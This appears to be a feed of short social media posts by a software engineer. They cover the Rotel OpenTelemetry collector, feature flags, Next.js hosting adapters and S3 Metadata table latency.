Number one reason I now add contact numbers to my phone from individuals that may only need to call once or twice, like a contractor.

The past 7 months @ramond.bsky.social and I have worked on the hypothesis that telemetry data requires a systems approach for high-perf, predictable and resource efficient collection at scale. We're excited to announce our progress so far and hope that the community can join us: dub.sh/A7sI0Tm

Rotel - High Performance, Resource Efficient OpenTelemetry Collector | Rotel High-performance, Resource Efficient OpenTelemetry Collector.

Had a great time sharing rotel.dev at #OpenO11ySummit + #OTelDay with @mike.heffner.io. Blown away by how many people had already heard of it and tried it.

β€œYeah we tried it and it was 8x faster than our existing solution”. We thought today was our first official announcement 🀣.

Google's truncating of the Github repo name in search results is not confusing at all.

Infrastructure Gravity & Domain Engineering | Jack Danger The following is an excerpt from Executive Engineering. Β  β€œYou become responsible, forever, for what you have tamed.” – Antoine de Saint-ExupΓ©ry, in The Little Prince Β  Each company draws its own ...

Excellent article on positioning domain engineering between product engineering and infrastructure engineering. I fully agree with the financial model section. However, I prefer to call it β€˜platform engineering: the hard parts,’ simply because in the middle, we face more volatile semantics.

Another reason, past cold start times, I'm glad we focused on optimizing our extension initialization time. It would be great if SecretsManager API calls were faster, since that's an often the long pole in the tent for init time. github.com/streamfold/r...

Next.js Deployment Challenges: Why platforms need better open source collaboration Discover the 6 key challenges platforms face when supporting Next.js deployments, including the lack of adapter support and undocumented behaviors. Learn how Netlify is working with OpenNext to build ...

I wanted to write something like this so many times when I was at Netlify! We always decided it was best to not make a fuss. Now I'm not at Netlify, I still believe abstracting the hosting layer via adapters makes for better framework architecture overall, as well as being better for the ecosystem.

I've definitely found this to be true and trying to debug it via traditional means like Google and SO is impossible since no human would have made that same error.

Yeah, honestly we used LD on a previous large migration project that probably used over a 100 FF's and it mostly got the job done. Moving traffic flows with user FF's always felt like a mismatch though.

Absolutely important. I'm curious if anyone has decoupled the needs of backend FF use from typical user-visible feature rollout FF.

The ordered sequence numbers provided in the metadata would seem to provide enough to build an S3 log streaming Warpstream/Bufstream equivalent without an external consistency store. However, at 10 min lag you wouldn't be able to stream anything in real time.

Doing some early experimentation with the new S3 Metadata tables and it looks like it can take 8-10 mins for new file metadata to appear. This would seem to align with the "within minutes" definition. aws.amazon.com/blogs/aws/in...
